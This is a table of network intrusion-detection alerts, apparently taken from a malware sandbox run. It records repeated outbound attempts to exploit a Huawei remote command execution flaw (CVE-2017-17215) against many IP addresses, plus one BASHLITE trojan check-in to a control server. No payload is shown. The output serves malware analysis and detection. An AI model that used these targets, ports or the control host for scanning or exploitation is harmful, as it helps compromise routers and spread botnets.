                                                        06/13/24-21:33:04.989692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3622637215192.168.2.14197.104.243.224
                                                        06/13/24-21:32:46.510378TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4593637215192.168.2.14156.248.79.24
                                                        06/13/24-21:33:05.016679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5420237215192.168.2.14197.68.113.226
                                                        06/13/24-21:32:01.221469TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3799437215192.168.2.14197.86.45.50
                                                        06/13/24-21:32:56.785195TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4857437215192.168.2.14197.240.211.180
                                                        06/13/24-21:33:00.868092TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4025037215192.168.2.1441.64.54.77
                                                        06/13/24-21:33:05.015907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5284637215192.168.2.1441.112.79.6
                                                        06/13/24-21:33:09.127401TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3334637215192.168.2.1441.108.50.86
                                                        06/13/24-21:32:46.510238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4089237215192.168.2.1441.110.23.245
                                                        06/13/24-21:32:17.696752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4415237215192.168.2.14197.226.38.62
                                                        06/13/24-21:32:21.783207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4854837215192.168.2.14156.127.216.140
                                                        06/13/24-21:32:36.265714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4340437215192.168.2.1441.151.34.201
                                                        06/13/24-21:32:34.195647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4299237215192.168.2.14197.221.202.237
                                                        06/13/24-21:32:50.617758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5612237215192.168.2.14197.161.1.160
                                                        06/13/24-21:31:59.198778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3886837215192.168.2.14197.103.31.12
                                                        06/13/24-21:32:19.754484TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3819637215192.168.2.1441.3.114.252
                                                        06/13/24-21:32:11.488525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4046837215192.168.2.1441.239.38.249
                                                        06/13/24-21:32:32.149176TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4316437215192.168.2.1441.38.140.126
                                                        06/13/24-21:33:15.254321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3312037215192.168.2.14156.53.144.136
                                                        06/13/24-21:32:13.547240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5035837215192.168.2.1441.239.18.109
                                                        06/13/24-21:33:15.252164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5741237215192.168.2.1441.185.41.130
                                                        06/13/24-21:32:52.660885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4727637215192.168.2.1441.98.228.141
                                                        06/13/24-21:33:04.994260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3353437215192.168.2.14197.74.45.81
                                                        06/13/24-21:32:03.275739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5977637215192.168.2.1441.4.72.60
                                                        06/13/24-21:32:46.527889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4373637215192.168.2.14156.179.94.20
                                                        06/13/24-21:33:13.213507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5810637215192.168.2.14197.15.45.212
                                                        06/13/24-21:32:19.730021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5036637215192.168.2.1441.86.171.169
                                                        06/13/24-21:33:00.887378TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5683037215192.168.2.14197.234.212.67
                                                        06/13/24-21:32:13.545486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3302637215192.168.2.1441.17.189.71
                                                        06/13/24-21:33:07.040345TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4788237215192.168.2.14156.159.127.71
                                                        06/13/24-21:32:44.457504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4767037215192.168.2.1441.217.39.120
                                                        06/13/24-21:32:15.609797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5873437215192.168.2.14197.39.138.169
                                                        06/13/24-21:33:02.950146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4306437215192.168.2.1441.71.212.244
                                                        06/13/24-21:32:54.708220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4858637215192.168.2.1441.241.223.168
                                                        06/13/24-21:33:02.953726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4555837215192.168.2.14156.206.96.223
                                                        06/13/24-21:33:04.990518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3477437215192.168.2.1441.102.119.51
                                                        06/13/24-21:32:28.026335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3452837215192.168.2.1441.91.247.154
                                                        06/13/24-21:32:44.451487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3607237215192.168.2.1441.73.222.15
                                                        06/13/24-21:32:46.509917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4947637215192.168.2.1441.143.91.206
                                                        06/13/24-21:32:01.218454TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3626037215192.168.2.14197.48.241.153
                                                        06/13/24-21:32:38.323418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4801237215192.168.2.14197.30.107.215
                                                        06/13/24-21:32:44.454731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5081437215192.168.2.1441.204.134.51
                                                        06/13/24-21:33:15.257930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4516637215192.168.2.14197.135.254.175
                                                        06/13/24-21:32:27.318931TCP2840515ETPRO TROJAN ELF/BASHLITE Variant Reporting Arch Type (i586)542104554192.168.2.14103.82.38.94
                                                        06/13/24-21:32:11.507830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4581237215192.168.2.14197.228.140.36
                                                        06/13/24-21:32:42.404821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5743837215192.168.2.14197.38.82.137
                                                        06/13/24-21:32:09.460045TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3864237215192.168.2.14156.71.54.76
                                                        06/13/24-21:32:21.783633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5849637215192.168.2.14197.28.235.148
                                                        06/13/24-21:32:28.025319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3525837215192.168.2.1441.228.248.177
                                                        06/13/24-21:32:28.043070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4338637215192.168.2.1441.255.60.5
                                                        06/13/24-21:32:58.820200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3915237215192.168.2.1441.233.6.35
                                                        06/13/24-21:33:11.180916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3350237215192.168.2.14197.151.102.25
                                                        06/13/24-21:32:19.753662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6016437215192.168.2.1441.105.187.56
                                                        06/13/24-21:31:59.177114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3775837215192.168.2.1441.184.239.229
                                                        06/13/24-21:33:09.087049TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4232037215192.168.2.1441.141.232.203
                                                        06/13/24-21:32:11.508749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5360637215192.168.2.14197.14.48.17
                                                        06/13/24-21:33:11.159969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3842037215192.168.2.1441.46.211.155
                                                        06/13/24-21:33:07.060931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4533037215192.168.2.14197.253.150.127
                                                        06/13/24-21:32:42.404978TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5585437215192.168.2.14197.18.31.181
                                                        06/13/24-21:32:09.457500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5491437215192.168.2.14197.39.183.198
                                                        06/13/24-21:32:40.359532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4968637215192.168.2.1441.98.131.23
                                                        06/13/24-21:33:11.177971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3547837215192.168.2.14197.99.202.211
                                                        06/13/24-21:32:42.424540TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5043237215192.168.2.1441.240.174.145
                                                        06/13/24-21:31:57.093372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3618637215192.168.2.1441.8.44.210
                                                        06/13/24-21:32:28.028848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5184637215192.168.2.14156.44.42.203
                                                        06/13/24-21:32:34.193305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5776237215192.168.2.1441.136.242.76
                                                        06/13/24-21:32:42.421180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4953237215192.168.2.1441.41.187.125
                                                        06/13/24-21:31:57.137648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5755237215192.168.2.1441.189.90.134
                                                        06/13/24-21:32:32.168527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6099437215192.168.2.14156.6.229.88
                                                        06/13/24-21:32:38.318158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3930637215192.168.2.14156.157.25.220
                                                        06/13/24-21:32:58.822139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4318037215192.168.2.14197.140.227.124
                                                        06/13/24-21:32:01.220011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4614037215192.168.2.14197.151.60.93
                                                        06/13/24-21:32:56.757412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3892037215192.168.2.1441.130.197.37
                                                        06/13/24-21:32:48.552340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5004637215192.168.2.14197.251.188.29
                                                        06/13/24-21:33:00.872608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5344637215192.168.2.14156.202.184.182
                                                        06/13/24-21:32:58.823295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5795237215192.168.2.14197.155.86.21
                                                        06/13/24-21:32:05.348912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3591437215192.168.2.1441.139.237.1
                                                        06/13/24-21:32:19.751938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4343437215192.168.2.14156.165.130.187
                                                        06/13/24-21:32:40.374446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5761237215192.168.2.1441.47.141.84
                                                        06/13/24-21:32:01.218860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5267237215192.168.2.1441.26.79.229
                                                        06/13/24-21:32:23.932698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3890637215192.168.2.1441.248.48.140
                                                        06/13/24-21:31:59.177865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3749037215192.168.2.14197.209.154.175
                                                        06/13/24-21:32:15.611328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4562837215192.168.2.1441.40.8.27
                                                        06/13/24-21:31:59.177678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3683037215192.168.2.14197.192.218.206
                                                        06/13/24-21:31:59.176969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4368837215192.168.2.1441.84.31.129
                                                        06/13/24-21:32:11.486707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4208037215192.168.2.1441.232.61.61
                                                        06/13/24-21:32:17.696107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3486837215192.168.2.14156.71.230.99
                                                        06/13/24-21:32:19.730522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4394637215192.168.2.14156.116.207.211
                                                        06/13/24-21:32:40.377705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3922637215192.168.2.14197.93.193.239
                                                        06/13/24-21:32:21.783681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5515037215192.168.2.14197.71.12.73
                                                        06/13/24-21:31:59.175243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5263837215192.168.2.14156.87.162.197
                                                        06/13/24-21:32:46.508245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3896437215192.168.2.1441.198.116.107
                                                        06/13/24-21:32:09.438941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5357637215192.168.2.14197.102.143.56
                                                        06/13/24-21:33:17.307892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6069037215192.168.2.1441.31.221.171
                                                        06/13/24-21:32:11.488777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4802437215192.168.2.14197.210.62.221
                                                        06/13/24-21:31:57.093868TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3483437215192.168.2.1441.74.218.69
                                                        06/13/24-21:32:50.614397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3904637215192.168.2.1441.207.188.109
                                                        06/13/24-21:32:40.372304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3359237215192.168.2.14156.64.83.45
                                                        06/13/24-21:32:52.679238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4604037215192.168.2.14197.85.226.188
                                                        06/13/24-21:33:07.055823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5994637215192.168.2.14197.149.31.8
                                                        06/13/24-21:33:15.273693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3424837215192.168.2.14156.15.244.234
                                                        06/13/24-21:33:00.869936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3753037215192.168.2.1441.206.90.216
                                                        06/13/24-21:32:48.550336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4736837215192.168.2.14156.179.187.204
                                                        06/13/24-21:31:57.092151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5580837215192.168.2.14156.119.146.174
                                                        06/13/24-21:32:42.420171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4100237215192.168.2.14197.24.142.3
                                                        06/13/24-21:32:32.169767TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3461037215192.168.2.14156.65.114.92
                                                        06/13/24-21:33:13.210926TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3590237215192.168.2.1441.191.226.160
                                                        06/13/24-21:32:17.694743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3353037215192.168.2.14197.103.144.113
                                                        06/13/24-21:32:15.608772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4541637215192.168.2.14156.10.163.216
                                                        06/13/24-21:32:03.307694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4137437215192.168.2.14197.239.228.132
                                                        06/13/24-21:32:40.376624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5844037215192.168.2.14197.137.180.218
                                                        06/13/24-21:32:46.524474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4574037215192.168.2.1441.67.94.195
                                                        06/13/24-21:32:19.753050TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5664437215192.168.2.14156.156.109.136
                                                        06/13/24-21:32:54.725550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4867837215192.168.2.1441.80.92.249
                                                        06/13/24-21:32:34.192493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5101437215192.168.2.14197.243.165.8
                                                        06/13/24-21:32:44.475360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5620837215192.168.2.1441.114.4.231
                                                        06/13/24-21:32:46.503280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3920437215192.168.2.1441.164.25.103
                                                        06/13/24-21:33:15.258989TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5924637215192.168.2.14156.214.52.5
                                                        06/13/24-21:32:11.508361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3899637215192.168.2.1441.219.202.226
                                                        06/13/24-21:32:40.379264TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4573637215192.168.2.1441.107.166.51
                                                        06/13/24-21:32:01.247605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5694037215192.168.2.1441.135.217.207
                                                        06/13/24-21:33:00.871651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4236437215192.168.2.14156.169.248.24
                                                        06/13/24-21:32:30.097319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3877837215192.168.2.1441.211.106.241
                                                        06/13/24-21:32:15.633777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4408437215192.168.2.1441.45.246.9
                                                        06/13/24-21:33:17.307525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5602837215192.168.2.14197.113.171.215
                                                        06/13/24-21:32:15.608435TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5633237215192.168.2.14156.151.237.168
                                                        06/13/24-21:33:07.040883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6099437215192.168.2.1441.252.135.162
                                                        06/13/24-21:32:36.263539TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3452237215192.168.2.1441.200.104.250
                                                        06/13/24-21:32:58.839312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3734437215192.168.2.14156.228.116.112
                                                        06/13/24-21:32:17.695584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5557637215192.168.2.1441.224.88.132
                                                        06/13/24-21:32:07.416018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5152437215192.168.2.1441.131.195.83
                                                        06/13/24-21:32:54.726578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4801037215192.168.2.1441.35.165.69
                                                        06/13/24-21:33:11.180448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5612637215192.168.2.14156.153.131.26
                                                        06/13/24-21:32:44.451207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4917437215192.168.2.1441.135.253.117
                                                        06/13/24-21:33:00.889456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3628237215192.168.2.1441.168.190.47
                                                        06/13/24-21:33:11.176264TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5438437215192.168.2.14156.45.10.198
                                                        06/13/24-21:32:11.489044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5000837215192.168.2.14156.15.215.115
                                                        06/13/24-21:32:09.457590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3570037215192.168.2.14156.143.47.14
                                                        06/13/24-21:33:04.992278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4423037215192.168.2.1441.185.70.48
                                                        06/13/24-21:32:05.347643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5082837215192.168.2.1441.55.103.22
                                                        06/13/24-21:32:25.972864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3994837215192.168.2.1441.13.202.209
                                                        06/13/24-21:32:44.450318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4629437215192.168.2.14197.28.90.249
                                                        06/13/24-21:31:59.176868TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6012237215192.168.2.1441.98.185.208
                                                        06/13/24-21:32:03.277271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4503437215192.168.2.14197.118.96.81
                                                        06/13/24-21:32:56.755873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3798237215192.168.2.14156.109.47.176
                                                        06/13/24-21:31:59.177028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5815637215192.168.2.14156.52.58.71
                                                        06/13/24-21:32:01.248243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4094637215192.168.2.14197.198.3.212
                                                        06/13/24-21:32:46.502702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3295637215192.168.2.1441.73.124.184
                                                        06/13/24-21:32:58.824552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4038637215192.168.2.14197.45.54.25
                                                        06/13/24-21:32:19.749156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5332037215192.168.2.1441.5.208.27
                                                        06/13/24-21:33:17.338721TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3439037215192.168.2.1441.216.69.246
                                                        06/13/24-21:32:01.223779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5321237215192.168.2.14156.163.132.170
                                                        06/13/24-21:33:13.228745TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4385237215192.168.2.14156.41.237.83
                                                        06/13/24-21:32:05.370719TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5440237215192.168.2.1441.141.113.229
                                                        06/13/24-21:32:38.317072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3473037215192.168.2.14156.143.179.234
                                                        06/13/24-21:32:44.475314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3995237215192.168.2.14156.30.188.108
                                                        06/13/24-21:32:32.168882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5372837215192.168.2.1441.50.174.33
                                                        06/13/24-21:32:54.725804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3995037215192.168.2.14156.12.131.138
                                                        06/13/24-21:31:57.129553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5702237215192.168.2.14197.120.240.105
                                                        06/13/24-21:32:48.555596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4209237215192.168.2.1441.235.227.100
                                                        06/13/24-21:32:30.079592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5100837215192.168.2.14156.140.237.117
                                                        06/13/24-21:32:36.242365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4246237215192.168.2.14156.85.152.197
                                                        06/13/24-21:32:15.604815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4800037215192.168.2.1441.100.178.170
                                                        06/13/24-21:32:03.279463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3539037215192.168.2.14197.21.174.146
                                                        06/13/24-21:32:48.550845TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3708437215192.168.2.14197.87.9.197
                                                        06/13/24-21:33:07.041008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5268837215192.168.2.1441.4.16.73
                                                        06/13/24-21:31:59.174784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4524037215192.168.2.14197.166.240.196
                                                        06/13/24-21:32:03.279910TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4408037215192.168.2.1441.76.31.108
                                                        06/13/24-21:32:28.048507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4892037215192.168.2.14156.253.177.253
                                                        06/13/24-21:32:54.726634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5839837215192.168.2.1441.239.29.191
                                                        06/13/24-21:32:09.458315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4763837215192.168.2.14156.64.80.53
                                                        06/13/24-21:33:09.111933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3304037215192.168.2.14156.81.34.25
                                                        06/13/24-21:32:21.786406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3677437215192.168.2.14156.37.116.193
                                                        06/13/24-21:33:07.057492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3497437215192.168.2.14156.11.128.80
                                                        06/13/24-21:32:58.824741TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4367037215192.168.2.14156.24.159.192
                                                        06/13/24-21:32:30.100474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4457237215192.168.2.14197.229.158.246
                                                        06/13/24-21:32:11.487889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3906437215192.168.2.14156.91.60.196
                                                        06/13/24-21:32:11.510181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4358237215192.168.2.14156.2.37.195
                                                        06/13/24-21:32:30.098631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4678437215192.168.2.14197.17.80.25
                                                        06/13/24-21:32:34.193560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4009637215192.168.2.14197.141.9.106
                                                        06/13/24-21:33:11.175471TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4595637215192.168.2.1441.246.238.148
                                                        06/13/24-21:33:13.213740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5790237215192.168.2.14156.69.109.248
                                                        06/13/24-21:32:11.509393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5723437215192.168.2.14197.143.121.101
                                                        06/13/24-21:32:48.570892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4805837215192.168.2.14197.208.246.116
                                                        06/13/24-21:33:09.090451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4509237215192.168.2.14197.91.121.214
                                                        06/13/24-21:31:57.091621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4026437215192.168.2.14156.73.77.88
